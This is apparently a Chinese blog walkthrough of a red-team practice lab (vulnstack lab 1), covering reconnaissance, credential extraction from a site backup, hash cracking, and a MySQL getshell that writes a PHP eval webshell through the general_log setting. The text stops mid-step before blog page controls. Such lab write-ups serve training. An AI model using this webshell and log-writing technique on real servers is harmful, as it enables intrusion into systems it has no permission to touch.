红队攻防知识分享-红日安全团队靶场1

环境搭建

靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境拓扑图:
请添加图片描述以下是虚拟机网络配置

虚拟机 网络配置
Windows7 x64 VMnet1:192.168.54.128;VMnet2:192.168.52.143
Win2k3 Measploitable VMnet1:192.168.52.141
Windows Server 2008 R2 x64 VMnet1:192.168.52.138
kali VMnet2:192.168.54.129

刚开机时,需要在Windows7中开启phpstudy,phpstudy在c盘下
在这里插入图片描述

信息收集

通过nmap收集到开启的服务有web服务以及mysql服务
在这里插入图片描述
扫描站点
在这里插入图片描述
经过整理得到三条信息:
1)beifen.rar 站点备份压缩包
2)http://192.168.54.128/phpmyadmin/index.php mysql登录后台页面
3)http://192.168.54.128/phpinfo.php php信息

1)备份压缩包里面有一个命名为yxcms的目录
在这里插入图片描述
从这里我们可以得到站点的架构以及信息
在升级日志中可以得知yxcms版本为1.2.1
在这里插入图片描述

在protected中的config文件里得到mysql的账号密码信息
在这里插入图片描述
2)访问mysql,输入账号密码,成功登录
获取到mysql版本信息
在这里插入图片描述

访问newyxcms库中的yx_admin表得到密码168a73655bfecefdb15b14984dd2ad60,猜测应该是做过md5加密,进行解密
在这里插入图片描述
得到密码:949ba59abbe56e05
在这里插入图片描述

3)phpinfo中,通过路径得知该服务器是Windows系统
在这里插入图片描述

通过查询yxcms版本我们进一步获取信息
后台地址,默认账号密码
在这里插入图片描述
查询yxcms1.2.1已知漏洞
在这里插入图片描述

漏洞利用

数据库弱密码,获取getshell

数据库默认密码root这个就不说了,获取getshell。

select '<?php eval($_POST[shell])?>' into outfile '路径' //需要知道绝对路径 

在这里插入图片描述
报错,没有权限。

show variables like '%general%'; //查看全局日志是否开启

在这里插入图片描述

set global general_log=on//开启全局日志

在这里插入图片描述

set global general_log_file="c://phpstudy/www/1.php"//指定新的日志路径

在这里插入图片描述

select '<?php eval($_POST[shell])?>'; //查找一句话木马,会将一句话
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值